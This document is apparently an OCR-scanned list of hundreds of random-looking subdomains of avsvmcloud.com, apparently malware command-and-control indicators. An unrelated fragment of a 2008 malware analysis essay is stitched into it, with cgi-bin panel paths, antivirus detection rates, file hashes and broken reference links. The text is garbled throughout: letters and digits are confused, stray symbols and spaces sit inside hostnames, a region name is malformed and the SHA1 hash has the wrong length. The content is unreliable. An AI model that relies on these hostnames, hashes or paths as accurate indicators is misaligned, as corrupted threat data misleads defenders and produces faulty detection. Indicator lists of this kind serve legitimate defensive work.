9pjO0e15ir4vnpd4ps14p.appsync-api.us-west-2.avsvmcloud.com 
9rm34379mq04gqll00qsdsi5f5jha6b9.appsync-api.us-east-2.avsvmcloud.com 
9rp2thl1grcbgsOloi60eouGiuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
9t04kr887915iiqurctemkf.appsync-api.us-east-1.avsvmcloud.com 
9t9eb05nbksstndu9clemk7.appsync-api.us-east-1.avsvmcloud.com 
9tinlio9phar7k9udjl2mkv.appsync-api.eu-west-1.avsvmcloud.com 
9tn2mmO6vjpsidquOcf23kh.appsync-api.us-east-1.avsvmcloud.com 
9uvn4seanflpa6dnncqge.appsync-api.us-east-1.avsvmcloud.com 
9v7t485vt5t4sm9lg535z0i3rq1rii0c.appsync-api.us-east-2.avsvmcloud.com 
9vpO0k6bgsfjihepku30b2st.appsync-api.us-east-2.avsvmcloud.com 
al16758p86m6jrsiotvef0b12eul1.appsync-api.us-east-1.avsvmcloud.com 
alfon7mkjrkm2vephutv21louo6n0t12e.appsync-api.us-east-1.avsvmcloud.com 
almouk3b9/7siesco6d6n0t6jOteu.appsync-api.us-east-1.avsvmcloud.com 
almouk3b97siesto6d6n0t6jOteu.appsync-api.us-east-1.avsvmcloud.com 
a30faelg42buh61o05u0ilel.appsync-api.us-east-2.avsvmcloud.com 
a5rrvn4gnlOvnfaf0l9v.appsync-api.us-east-1.avsvmcloud.com 
a6m15o0ssl194vinoe2q0012eul.appsync-api.eu-west-1.avsvmcloud.com 
a6t9c7ufd2ekhfpoe26ts2wr60i12eul.appsync-api.eu-west-1.avsvmcloud.com 
a830jko69cui3sjo6d6n006jOceu.appsync-api.us-east-1.avsvmcloud.com 
a8breb9tOm3edt1lpwh60gun0owusouvO.appsync-api.us-east-1.avsvmcloud.com 
a8eocln6iqdb454pe6vi0cdsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
a8eocln6iqdb456pe6vi0edsovertr2s.appsync-api.us-east-1l.avsvmcloud.com 
a93ah61p4a7i4psfalao.appsync-api.us-west-2.avsvmcloud.com 
abOrpcO0jd4667vpds2n0i3uholi2v02.appsync-api.us-west-2.avsvmcloud.com 
adap71dua4q/5f031gpm91r.appsync-api.us-east-2.avsvmcloud.com 
adl90ta94dctfj03s72m911.appsync-api.us-west-2.avsvmcloud.com 
adqjnvh35j9e64s3gllm91k.appsync-api.us-west-2.avsvmcloud.com 
aemg6tv2qtdfs8atcjab3lv.appsync-api.us-west-2.avsvmcloud.com 
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cgi-bin/ss.cgi 

cgi-bin/pstore.cgi 

cgi-bin/cmd.cgi 

cgi-bin/file.cgi 

Did anti virus vendors come up with a detection pattern for the .js already? Partly. 
Detection rate : Result: 11/32 (34.38 %) JS.IEslice.aq; JS/SillyDIScript.DG; Exploit:JS/Mult.K 
File size: 31679 bytes 

MD5: 93152dc2392349d828526157bf601677 

SHA1: 16b10790d16c9c0d87132d40503b37f82b7f03560 


And now that we’ve witnessed the execution of such an advanced and random attack approach 
limiting the possibilities for assessing the impact of a malware embedded attack the way it was 
done so far, we can only speculate on what’s to come by the end of the first quarter of 2008. 
From my perspective however, the smartest thing in this type of attack technique is that they 
limit the leads they leave behind to the minimum, thus, forwarding the responsibility to the 
infected host and limiting the possibility for easy expanding of the rest of their ecosystem. 
Moreover, despite that the module or the actual kit if it’s really a kit is a [7]Proprietary Malware 
Tool for the time being, it will sooner or later leak out, and turn into a commodity, just like 
MPack and IcePack are these days. 


. http://www. finjan.com/Content .aspx?id=136 


1 
2. http: //www.finjan.com/Pressrelease.aspx?id=1820&PressLan=1819&lan=3 

3. http://www. publictechnology .net/modules . php?op=modload&name=News&file=article&sid=1368 
4. http://www. informationweek.com/news/showArticle. jhtml?articleID=205603044 
5 
6 
7 


. http: //searchsecurity.techtarget .com/originalContent/0, 289142, sid14_gci1293685,00.htm 


. http://www. securityfocus.com/news/11501 
. http: //ddanchev. blogspot .com/2007/10/dynamics-of-malware-industry.htm 
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aer6fs1067gvgj0t168b375.appsync-api.us-east-2.avsvmcloud.com 
afub5rfnofv2j80poi60eou6iuirOern.appsync-api.us-east-2.avsvmcloud.com 
afub5rfnofv2j8fpoi6020u6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
agao0754idnbr0epe6vi0edsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
agb/7tcpt6bbjbulotvef0il2eul.appsync-api.us-east-1.avsvmcloud.com 
agconn349|4ihueo6d6n0t6jOgeu.appsync-api.us-east-1.avsvmcloud.com 
agfcflumrv7sOahp0Omudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
aggum@Qijleks37npuhsOie2sd02ovirl.appsync-api.us-east-1.avsvmcloud.com 
agrnc0o0en313!1990vwonou0ce2h.appsync-api.us-east-1.avsvmcloud.com 
agv3v4qvhhibticouhul500i12eul.appsync-api.us-east-1.avsvmcloud.com 
ah5iheqhno6d53sfrgvc.appsync-api.us-west-2.avsvmcloud.com 
ah5j3v8bbunet7keblpbq7n.appsync-api.us-east-2.avsvmcloud.com 
aha8b7st45qcp8kfu741.appsync-api.us-east-2.avsvmcloud.com 
ai35s6pknq4t813q9j5akuomd18ak2o0b.appsync-api.us-east-2.avsvmcloud.com 
aih4cvusnlfhgg2o0jed10ce2h.appsync-api.us-east-2.avsvmcloud.com 
aiopjm31lbum5oktp7oddrsifcovt0Ooe2.appsync-api.us-east-2.avsvmcloud.com 
aj96unpachpelllofo60gjrvidgrnf.appsync-api.us-east-1.avsvmcloud.com 
ajdmlq30e806msipeo0gnfclovObeu0g.appsync-api.us-east-1.avsvmcloud.com 
ajhlj8sfkjigtrrohol1rntrwol11r0tl.appsync-api.us-east-1.avsvmcloud.com 
ajluq9folhnse7vpuhsOee2sd0oovirl.appsync-api.us-east-1.avsvmcloud.com 
ajttonber2i5Imop00iesdbOvfhedl45.appsync-api.us-east-1.avsvmcloud.com 
amar5a8d1u6riheoeuheoip0il2eul.appsync-api.us-west-2.avsvmcloud.com 
amfijouiOmgfr6ep00nurl25vn82vimd.appsync-api.us-west-2.avsvmcloud.com 
ao3crspkhs9ol2ipq535z0i3rq1rii0g.appsync-api.us-east-2.avsvmcloud.com 
ao4b8iiiool2ncrpoi602o0uG6iuir02rn.appsync-api.us-east-2.avsvmcloud.com 
ao4vk8mq2hv6fo0pun022dioho7r1lp0e.appsync-api.us-east-2.avsvmcloud.com 
aocOte6n2lot4hkop2sji2v0ee25p.appsync-api.us-east-2.avsvmcloud.com 
aovm85jocafddOuou30i2st.appsync-api.us-east-2.avsvmcloud.com 
ap6jokp4ptlru003d15b91n.appsync-api.us-west-2.avsvmcloud.com 
aperlgp7qehd3gk35I5b91i.appsync-api.us-east-2.avsvmcloud.com 
aq5po2a8ub2r56alocvl.appsync-api.us-west-2.avsvmcloud.com 
aqf4iscuscnrsual8600.appsync-api.us-west-2.avsvmcloud.com 
aqkiop48ji2|1calici7.appsync-api.us-west-2.avsvmcloud.com 
aqr078go04nad5201080l.appsync-api.us-east-2.avsvmcloud.com 
ardfbasltdfmfmpoe6u0b12eul.appsync-api.us-west-2.avsvmcloud.com 
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arl4spn3psoerc4pwh60tun02wusouvO.appsync-api.us-west-2.avsvmcloud.com 
asp507nm76nlrpO8acnmv1f.appsync-api.eu-west-1.avsvmcloud.com 
auqmhul5lj 7in3a8bjdmflv.appsync-api.eu-west-1.avsvmcloud.com 
auta6f67818095k57c19.appsync-api.us-east-1.avsvmcloud.com 
avau7h3em6svmnmpnotoiulsrue3ove0.appsync-api.us-west-2.avsvmcloud.com 
avn0o2schirh90cp00mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
b059d202t4kbhujijrvs.appsync-api.us-west-2.avsvmcloud.com 
blimfaabnfvurO0p0ee2h.appsync-api.us-east-2.avsvmcloud.com 
b2ta517h07r08u8nlbhs.appsync-api.us-east-1.avsvmcloud.com 
b31375voq71rpl7ptvef0el2eul.appsync-api.us-east-1.avsvmcloud.com 
b31cb2bqdb6fvqnqun021locsuspOefel.appsync-api.us-east-1.avsvmcloud.com 
b36fgqacsO60p81rq0Omudofi75f4tjvh.appsync-api.us-east-1l.avsvmcloud.com 
b37kljuufr11902qoi60bouG6iuirO2rn.appsync-api.us-east-1.avsvmcloud.com 
b47u90kfc31a931jeoggftv.appsync-api.us-east-1.avsvmcloud.com 
b55v9e9p521|4hejilivj.appsync-api.us-west-2.avsvmcloud.com 
b56nuk5kgsfltfjimr9t.appsync-api.us-east-2.avsvmcloud.com 
b59Im6vemaq5im128vlgeag.appsync-api.us-east-2.avsvmcloud.com 
b6605db6jomt93mq00e4 r4ii5nj9quiu.appsync-api.us-west-2.avsvmcloud.com 
b6e4e15hg35e2blq001sqoimd18ak20b.appsync-api.us-west-2.avsvmcloud.com 
b808u0eb8nb6imdvqun022dioho7r1pO0i.appsync-api.us-east-2.avsvmcloud.com 
b88igOre7hOgfc5qO00i2rori9u04t4i3.appsync-api.us-east-2.avsvmcloud.com 
bahf677g1nvifOjgibjt.appsync-api.us-west-2.avsvmcloud.com 
bc3ngb7u197025qqwh602un02wusouv0.appsync-api.us-west-2.avsvmcloud.com 
bclkdenuvgbekmcq00q49s20f12ql200.appsync-api.us-west-2.avsvmcloud.com 
bd4kbrk9ug2hij8pmf63.appsync-api.us-east-1l.avsvmcloud.com 
bdtuv953pkgvl11lo6vj12tl.appsync-api.eu-west-1.avsvmcloud.com 
be8fptn47bsa8gggpmq0.appsync-api.us-east-1.avsvmcloud.com 
bf148nfalt55n1lgp5u021e1.appsync-api.us-east-1.avsvmcloud.com 
bfbnélfOjjqg4pkquhsOge2sdOtovirl.appsync-api.us-east-1.avsvmcloud.com 
bfrnp55an3kiavOpe2h.appsync-api.us-east-1.avsvmcloud.com 
bg5mulun7|3uqdppu3002st.appsync-api.us-east-2.avsvmcloud.com 
bg8nolsglirq3dr3qn2jjrvrvtovrrsov.appsync-api.us-east-2.avsvmcloud.com 
bgh8g52s8toi9ppqun022dioho7r1pO0i.appsync-api.us-east-2.avsvmcloud.com 
bgs4b6l7 7jtbv8dqoi60eou6iuirOtrn.appsync-api.us-east-2.avsvmcloud.com 
bi8d3md8ptapmapquhsO0oe2sd0oovirl.appsync-api.us-east-1.avsvmcloud.com 
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bifks6tofmv1lmb3qoi60eou6iuir0ern.appsync-api.us-east-1.avsvmcloud.com 
bifks6tofmv1lmbqqoi60eouGiuirOern.appsync-api.us-east-1.avsvmcloud.com 
bik9rjeuOnmgqn9aqO00iesdbOvfheOl45.appsync-api.us-east-1.avsvmcloud.com 
birhrvj80ukmtlpp6s20ewr6i52sObnj.appsync-api.us-east-1.avsvmcloud.com 
bivcd4mcdvofqe9pu0grnf.appsync-api.us-east-1.avsvmcloud.com 

bj8i6tq8qf7 ptboqe2sd0g6isuif6vri.appsync-api.us-east-2.avsvmcloud.com 
bjkjagkfb84tob6p6fdrso2sOb12eul.appsync-api.us-east-2.avsvmcloud.com 
bI8hpgqa0p7v6arpurso2ve2sd02e2h.appsync-api.us-west-2.avsvmcloud.com 
blan0lmOngp2nn7ptpinrvnul0c12eul.appsync-api.us-west-2.avsvmcloud.com 
bIlf5bpOm9bnaa3gqwh60cunOewusouvoO.appsync-api.us-west-2.avsvmcloud.com 
blqimé6féuul4volq0Omudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
blqco7jgokolv9dpe6u0el2eul.appsync-api.us-west-2.avsvmcloud.com 
blqtnhtren4tdhkpeo6e20be2h.appsync-api.us-west-2.avsvmcloud.com 
bn5sde8256040njptiv3.appsync-api.us-west-2.avsvmcloud.com 
bnassneeflvb3djodrjg9tl.appsync-api.us-east-2.avsvmcloud.com 
bnqikk6p3j1n558piflj.appsync-api.us-west-2.avsvmcloud.com 
boObishlre42vupp6o06jop2f60grnf.appsync-api.us-east-1.avsvmcloud.com 
bogllj4albh6vg4p6d6n0i6jOteu.appsync-api.us-east-1.avsvmcloud.com 
bogllj4aloh6vgup6d6n0g6jOoeu.appsync-api.us-east-1.avsvmcloud.com 
bon9dj220u3qg94q00iesdbOvfhe0l45.appsync-api.us-east-1.avsvmcloud.com 
bpfm9ckku6ruasgp3fv2.appsync-api.eu-west-1.avsvmcloud.com 
bqvbvhg02p17vhjub301ma5.appsync-api.us-east-1.avsvmcloud.com 
bt19h4euuk925fgui3ugma0.appsync-api.us-west-2.avsvmcloud.com 
bujiofj362ckvugjcovgft7.appsync-api.us-west-2.avsvmcloud.com 
Clgm3csqdrr4a59r00mudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
clu3nqeuu6v24etqtvef0tl2eul.appsync-api.us-east-1.avsvmcloud.com 
c20t683icb6iaeIn8aqjs6v8v.appsync-api.us-west-2.avsvmcloud.com 
c4e4btlh4int2uu8ljncv87.appsync-api.us-east-2.avsvmcloud.com 
c4e53b512q3iert54ccp.appsync-api.us-west-2.avsvmcloud.com 
c4mdq4n776mq17n8mjs6v8v.appsync-api.us-east-2.avsvmcloud.com 
c52dojtssifd4h5f6l6u.appsync-api.us-east-1.avsvmcloud.com 
c6aeorrprknv98pqc2d0ce2hOtdj.appsync-api.eu-west-1.avsvmcloud.com 
c9t45jcnc5jcéltff71v.appsync-api.us-west-2.avsvmcloud.com 
cbhdvbiqmkO5itobqhom2v30110ie2h.appsync-api.us-west-2.avsvmcloud.com 


cbfr07jrtrhqckirnrvo70enrvo7cuvj.appsync-api.us-west-2.avsvmcloud.com 
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cbh7c256iphOvctr5onrloipe2hh0i12.appsync-api.us-west-2.avsvmcloud.com 
cbkq88d8nqqbaqr4q5i5ef0ce2sd.appsync-api.us-west-2.avsvmcloud.com 
cfjusftah654qukrun0cu7usi3soi0o60.appsync-api.us-east-2.avsvmcloud.com 
cg6u7qu6omh2a46hqe2q0i12eul.appsync-api.us-east-1.avsvmcloud.com 
cgkp6qOu8gvvOtjqi32ft3i6d2i0eovi.appsync-api.us-east-1.avsvmcloud.com 
chbvh7dprhInoeuflguu.appsync-api.us-west-2.avsvmcloud.com 
ciepcqqog816s6urtt6tOkf60ceo6e20.appsync-api.us-east-2.avsvmcloud.com 
cihtrinj36c63hIlqvwonou02e2h.appsync-api.us-east-2.avsvmcloud.com 
cij34md4aqtO0a2vroi602o0u6iuir0irn.appsync-api.us-east-2.avsvmcloud.com 
cioukvtchch49sgrun02u7usi3soio60.appsync-api.us-east-2.avsvmcloud.com 
cj17b39ca729ujjqO1lqqtobmv1.appsync-api.us-east-1.avsvmcloud.com 
cj7939h35krs5veqtvefOb12eul.appsync-api.us-east-1.avsvmcloud.com 
Cjjigubsv6egfnuq6éd6n026j02eu.appsync-api.us-east-1.avsvmcloud.com 

cjuj 7cksp406da4re6vi0bdsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
cnh51luuhglaci6nh4g4p.appsync-api.eu-west-1.avsvmcloud.com 
cphnpqtenmadtguh2g7m.appsync-api.us-west-2.avsvmcloud.com 
cppkbbrs1j1j8h53v700h8d.appsync-api.us-east-2.avsvmcloud.com 
crjo68nui2fg30dqc3a0gluv.appsync-api.us-west-2.avsvmcloud.com 
crnt92r0q52ehubq1f5jovirmu60tvri.appsync-api.us-west-2.avsvmcloud.com 
cv59opucflv59icrOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
cv9a0989006ebg5r00quksbsvggtquo0.appsync-api.us-west-2.avsvmcloud.com 
d138iu5qqeh271nsexr08ovirsvul0ee.appsync-api.us-west-2.avsvmcloud.com 
d1lbinvi2tegvou6swh60iunO0iwusouvO.appsync-api.us-west-2.avsvmcloud.com 
d1ddjl7g30lugkrrde6e20ge2h.appsync-api.us-west-2.avsvmcloud.com 
dlol2ctcc9r0Innrurso2ve2sd0ee2h.appsync-api.us-west-2.avsvmcloud.com 
dis9qaucacOfkmpriu0o2st.appsync-api.us-west-2.avsvmcloud.com 
dishv17sgav6mvrsOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
d56g8g5s2h1dfvridr04.appsync-api.us-east-2.avsvmcloud.com 
d5ng9hehlocs5fbidirf.appsync-api.us-west-2.avsvmcloud.com 
d6amofiedc4nfbbswol11r0oirssrc2vv.appsync-api.us-east-2.avsvmcloud.com 
d6n6sr6l7c5asO5r9uf29149711e.appsync-api.us-east-2.avsvmcloud.com 
d8lfdqpoamf9m7rhswh60cunOowusouvo0.appsync-api.us-west-2.avsvmcloud.com 
d8m8punagh9201vsexr08ovirsvul0ee.appsync-api.us-west-2.avsvmcloud.com 
d8s843mbuoomfessOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
da2k6mgugrt5u3mg3mlIt.appsync-api.us-west-2.avsvmcloud.com 
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dae7jsoakoq01lkmugmmpmOb.appsync-api.us-west-2.avsvmcloud.com 
db1dlluasop4v86r6d6n0g6j0O2eu.appsync-api.us-east-1l.avsvmcloud.com 
db1dlluasop4v8jr6d6n0c6jOgeu.appsync-api.us-east-1.avsvmcloud.com 
dbl29e7j4jlv269swh60iunOewusouvO.appsync-api.us-east-1.avsvmcloud.com 
dcb9pmridv38fklr5i5efObe2sd.appsync-api.us-east-2.avsvmcloud.com 
dcbpoltkto5862oroiul.appsync-api.us-east-2.avsvmcloud.com 
dcdag6qia86ovevru30g2st.appsync-api.us-east-2.avsvmcloud.com 
dce6d1f9a74sqlfsoi60eouGiuirOtrn.appsync-api.us-east-2.avsvmcloud.com 
dclbk2up791cd16rh.appsync-api.us-east-2.avsvmcloud.com 
dcp6ki6k76hak5vr9uf29149711e.appsync-api.us-east-2.avsvmcloud.com 
ddah2g3tildju4rplir2.appsync-api.us-east-1.avsvmcloud.com 
dehs4njobp8r5dbgq37o0.appsync-api.eu-west-1.avsvmcloud.com 
dfdg889mkr8233qr6ne30i12eul.appsync-api.eu-west-1.avsvmcloud.com 
dgg9gVls8gvgqepgre2mvridie2mM02e2h.appsync-api.us-west-2.avsvmcloud.com 
dhd3lq463ljgofmiort6.appsync-api.us-east-1.avsvmcloud.com 
dhf6mkcOlvkmotm24roeqkg.appsync-api.us-east-1.avsvmcloud.com 
difa7emqmmeihh1ire2q0b12eul.appsync-api.eu-west-1.avsvmcloud.com 
difa7emqmmeihh7re2q0b12eul.appsync-api.eu-west-1.avsvmcloud.com 
dim24hdrbOdst7pr071mt0im00feaaso.appsync-api.eu-west-1.avsvmcloud.com 
dj8ao3dos6ld11lgrvridewr6i52s0enj.appsync-api.us-west-2.avsvmcloud.com 
dja2dsvkfndnjk7sds2n0e3uho1li2v0e.appsync-api.us-west-2.avsvmcloud.com 
djsk60v5e51jvo7swh60iunObwusouv0O.appsync-api.us-west-2.avsvmcloud.com 
djsk60v5e51jvohswh60oun02wusouvo0.appsync-api.us-west-2.avsvmcloud.com 
dk04s1qe81r234borigp9nk.appsync-api.us-east-2.avsvmcloud.com 
dkaddos2erkolubpjr3m.appsync-api.us-west-2.avsvmcloud.com 
dib69er4rl5ijoasul1irts2vri02e20b.appsync-api.us-east-2.avsvmcloud.com 
dilqlbphO0O0gIlmtgr5u001lel.appsync-api.us-east-2.avsvmcloud.com 
dm12uobg6vial0dse2sd026iovtsupno.appsync-api.us-east-1.avsvmcloud.com 
dm3mulrt5kj6fOrsnotoiul6rv6r0ce2.appsync-api.us-east-1.avsvmcloud.com 
dmank7g6rkuvj5grfo60ejrvi02rnf.appsync-api.us-east-1.avsvmcloud.com 
dmdb4di02rq9r16r6e0idohu0et2w.appsync-api.us-east-1.avsvmcloud.com 
dmfd67ucs3n4mc4r6d6n006j00eu.appsync-api.us-east-1.avsvmcloud.com 
dmpr942pl4cndvjseoip256uesuhrvi2.appsync-api.us-east-1.avsvmcloud.com 
dn054en35dq4flbp2ffj.appsync-api.us-west-2.avsvmcloud.com 
dnekitp4bfgpjlrobfs39ng.appsync-api.us-west-2.avsvmcloud.com 
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dnfmgavi0tr44qbp7f06.appsync-api.us-west-2.avsvmcloud.com 

dnkcj Lmul5dh8dbp2v98.appsync-api.us-east-2.avsvmcloud.com 
dnpb1s7tr59ecpvpora8.appsync-api.us-east-2.avsvmcloud.com 
dolb13iike88fsnror60ce2h.appsync-api.eu-west-1.avsvmcloud.com 
dqmgs69sd1p7govgmom/7.appsync-api.us-east-1.avsvmcloud.com 
drOd5kfq8nupil8se6vi0gdsovertr2s.appsync-api.us-east-1l.avsvmcloud.com 
dr5hpngivq2!7k9rsee50csf.appsync-api.us-east-1.avsvmcloud.com 
dregnghgkOpjkOnswuviutrnuiuervir.appsync-api.us-east-1.avsvmcloud.com 
drkc90966vk900ar00tsrl2075eudki.appsync-api.us-east-1.avsvmcloud.com 
drm1vig56j36hfisqscuf6éisulouOtun.appsync-api.us-east-1.avsvmcloud.com 
drrtasguvjrko8krtvef0212eul.appsync-api.us-east-1.avsvmcloud.com 
ds333hkk4ti36bbn9mg9.appsync-api.us-west-2.avsvmcloud.com 
dsaaps3srulidlvnmm26.appsync-api.us-west-2.avsvmcloud.com 
dt3uue90n5038amu83gomk1.appsync-api.us-west-2.avsvmcloud.com 
dt6rv1l4nvigugemglo2f.appsync-api.us-west-2.avsvmcloud.com 
dtj5gnrpnj8012vuf3vemk7.appsync-api.us-west-2.avsvmcloud.com 
du2fmv91feouemmnr36u.appsync-api.us-west-2.avsvmcloud.com 
dus4egopluct8fmnt3i4.appsync-api.us-west-2.avsvmcloud.com 
dv50krctfobl2i8rtvef0b12eul.appsync-api.us-east-1.avsvmcloud.com 
dv50krctfobl2imrtvef0tl2eul.appsync-api.us-east-1.avsvmcloud.com 
dv6feovu284kjlorscr0g6jO2eu.appsync-api.us-east-1.avsvmcloud.com 
dv85mko4cgmgtjOsOOmudofi75f4tjvh.appsync-api.us-east-1.avsvmcloud.com 
e115647kn3d2f5otnrihosO7ts2fd0cs.appsync-api.us-east-1.avsvmcloud.com 
elkinepgomké6vbrstvef0g12eul.appsync-api.us-east-1.avsvmcloud.com 
elpiosdphv9qv3ptwh60gunOowusouvO.appsync-api.us-east-1.avsvmcloud.com 
elq28b9aaoboeugtuhsOge2sdO0tovirl.appsync-api.us-east-1.avsvmcloud.com 
elvbsh5vl90omfete6vi0edsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
e23dmj48dm5lepagejhprh5.appsync-api.us-west-2.avsvmcloud.com 
e33khi5qnfbl2vvtoi60couG6iuirOgrn.appsync-api.us-east-2.avsvmcloud.com 
e3p0d7aaeks8p3rtisOgire3vo2v02ue.appsync-api.us-east-2.avsvmcloud.com 
e4250r580qegelau2c62.appsync-api.us-west-2.avsvmcloud.com 
e4ijkl8n4md2tfaun8pe.appsync-api.us-east-2.avsvmcloud.com 
e8cucug2t2|In8p1ss60i12eul.appsync-api.us-east-1.avsvmcloud.com 
e8fb6hn7lqbogfute6vi0odsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
e8fhlravufmsOqptO0gudir295 ludivf.appsync-api.us-east-1.avsvmcloud.com 
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e8h2vel9711jjcpte3so6iorelovoeO0t.appsync-api.us-east-1.avsvmcloud.com 
e8ueb8kp9vo6aitsscr0t6jOeeu.appsync-api.us-east-1.avsvmcloud.com 
€954h0259m3i310p87j049l.appsync-api.us-west-2.avsvmcloud.com 
e9a09djfh7g9ke003lo2.appsync-api.us-west-2.avsvmcloud.com 
e9qjhboh21cicfso9I8h.appsync-api.us-west-2.avsvmcloud.com 
e9unoit80beg5lao2cbm.appsync-api.us-west-2.avsvmcloud.com 
ealc3urcnq115fkjo6qc.appsync-api.eu-west-1l.avsvmcloud.com 
eb5f9dd8rlmuap2scj0g12eul.appsync-api.us-west-2.avsvmcloud.com 
eb86erv58g4hmbgsuv6e(0it2cOcdr.appsync-api.us-west-2.avsvmcloud.com 
ebb5h6ad0cu9bs2t0Omudofi7 5f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
ebkf2n2qo14ivj1lsO0esqjvi0fjuOn3.appsync-api.us-west-2.avsvmcloud.com 
ebo32rdrcp5kpg 7tOOmudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
ebo32rdrcp5kpgvt0Omudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
ebpjshc01131vbstunhovOoeullonf6e.appsync-api.us-west-2.avsvmcloud.com 
ed9u7g4249p1IcOiple3ghi.appsync-api.us-east-2.avsvmcloud.com 
edhgtlgpkakmj7sio7h3phk.appsync-api.us-west-2.avsvmcloud.com 
edu3eivfoubg9ms2v7bd.appsync-api.us-west-2.avsvmcloud.com 
ee4sbicOkju58isn7ck3b95.appsync-api.us-east-2.avsvmcloud.com 
eeagq0kks1k4240jp80e.appsync-api.us-west-2.avsvmcloud.com 
eeem3mvgptipqqaj78cn.appsync-api.us-west-2.avsvmcloud.com 
eefi7vg900l6mpsnhceobYf.appsync-api.us-east-2.avsvmcloud.com 
eeguf585168kkiajqjd9.appsync-api.us-west-2.avsvmcloud.com 
eevd3asgkvidj4aj685e.appsync-api.us-west-2.avsvmcloud.com 
ef4j59ohojpulg8te2sdO0té6isuif6vri.appsync-api.us-east-2.avsvmcloud.com 
efdv68g3uppsi4gs5u0ilel.appsync-api.us-east-2.avsvmcloud.com 
efhc95pv34ihklftoi6OQeouGiuirOcrn.appsync-api.us-east-2.avsvmcloud.com 
efmkfinan3olovktoi6020u6iuirOtrn.appsync-api.us-east-2.avsvmcloud.com 
egrr2936c9i3mnst5sorvn6 30d6iuirc.appsync-api.us-east-1.avsvmcloud.com 
egusb7ilve6uo9ltuhsOge2sdO0iovirl.appsync-api.us-east-1.avsvmcloud.com 
ehtOr7kkpOr9pcspigo329r.appsync-api.us-west-2.avsvmcloud.com 
eiug79kqm69riqlsrd10ee2h.appsync-api.us-east-2.avsvmcloud.com 
ejlbl9n0l4609v4te6vi0bdsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
ejacb6qj6i2cc3vssd.appsync-api.us-east-1.avsvmcloud.com 
ejg42tjo8tqjeg2teoip256uesuhrvi2.appsync-api.us-east-1.avsvmcloud.com 


elgaesftnscirhlsc2d0te2h02dj.appsync-api.eu-west-1.avsvmcloud.com 
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elgienlbfhrisrdtO0qu7lbvflge7jo0.appsync-api.eu-west-1.avsvmcloud.com 
eodtalvjhsjtgtcs3iquvhthi0c12eul.appsync-api.us-east-2.avsvmcloud.com 
eq23frv5otjgq3ajv66s.appsync-api.us-west-2.avsvmcloud.com 
eqhnnipnnm2733kn08m3097.appsync-api.us-east-2.avsvmcloud.com 
erllhkq8pdv9sg7toi60gou6iuirOcrn.appsync-api.us-west-2.avsvmcloud.com 
erfij3jcv5pia7sseuheoip0e12eul.appsync-api.us-west-2.avsvmcloud.com 
etiqvtleO6kqpksjrcje.appsync-api.us-east-1.avsvmcloud.com 
ev3i3ekbbqgjOhptds2n0e3uho1i2v0o0.appsync-api.us-west-2.avsvmcloud.com 
evflengtp979kl1toi60gouGiuirOcrn.appsync-api.us-west-2.avsvmcloud.com 
evflenqtp979klvtoi6O0iou6iuirOcrn.appsync-api.us-west-2.avsvmcloud.com 
f2ao0o3b8pg2p7ceuf83m.appsync-api.us-west-2.avsvmcloud.com 
f2rnn90n07na0segu6mum27.appsync-api.us-east-2.avsvmcloud.com 
f2tpo3a8pb2p56eu08m7.appsync-api.us-west-2.avsvmcloud.com 
f338llositnmqhpt05j5e7n3mrgit7p.appsync-api.us-west-2.avsvmcloud.com 
f36hv0ad2n3dnabthom2v30110ge2h.appsync-api.us-west-2.avsvmcloud.com 
f38tp3nd09pr2c9u00mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
fF38tp3nd09pr2cvu00mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
f39s3d02vksn1Iihtv6q3ruli30cvri.appsync-api.us-west-2.avsvmcloud.com 
f3cfelercje7r54u00mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
f4q5iq350q5ia3hub6ov.appsync-api.us-west-2.avsvmcloud.com 
f6gsl4d0s2cu9boue6vidgdsovertr2s.appsync-api.us-east-1.avsvmcloud.com 
fOnfppY9ej2sIh82oilr4.appsync-api.us-west-2.avsvmcloud.com 
fahdpickrrebmnpnO8jub4f.appsync-api.us-east-1.avsvmcloud.com 
fau00hmnsji2qsejvjbn.appsync-api.us-east-1.avsvmcloud.com 
fo50klvtgqO0b2h1t5u00lel.appsync-api.us-east-2.avsvmcloud.com 
foa157qr9i4r5uft00isdorp9ujh9bi.appsync-api.us-east-2.avsvmcloud.com 
fc2jtvng7r3u351luuhsOee2sd0eovirl.appsync-api.us-east-1.avsvmcloud.com 
fe2jtvng7r3u355uuhsObe2sdO0govirl.appsync-api.us-east-1.avsvmcloud.com 
fdjl2gh3b2qgp722p74g.appsync-api.us-west-2.avsvmcloud.com 
fiinjibcqOhna6uteuheoipO0t12eul.appsync-api.us-west-2.avsvmcloud.com 
fj/d9n52027bjrtkte2q0o12eul.appsync-api.eu-west-1.avsvmcloud.com 
fkfrovomghbfv522v1hn.appsync-api.us-east-1.avsvmcloud.com 
flhri95764f8arnt5u021el.appsync-api.us-east-1.avsvmcloud.com 
fllsk499sp8uvbcue6vi0edsovertr2s.appsync-api.us-east-1.avsvmcloud.com 


fmh8b02qbe7qa20uen60o0eudoluv2f0c.appsync-api.us-east-2.avsvmcloud.com 
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fo30qreov24tpk9te6u0el12eul.appsync-api.us-west-2.avsvmcloud.com 
fomfh7edc8t7 bOuu00mudofi75f4tjvh.appsync-api.us-west-2.avsvmcloud.com 
fp825pq2bv5u6pe2m1pu.appsync-api.us-west-2.avsvmcloud.com 
fog5e55fl4mkpr2241dg.appsync-api.us-west-2.avsvmcloud.com 
fpplu6g2n4mg0v2ialv5p2r.appsync-api.us-east-2.avsvmcloud.com 
fq1d497qahlici2jh691.appsync-api.us-west-2.avsvmcloud.com 
fq37i6hu4e5i25ejn6a4.appsync-api.us-west-2.avsvmcloud.com 
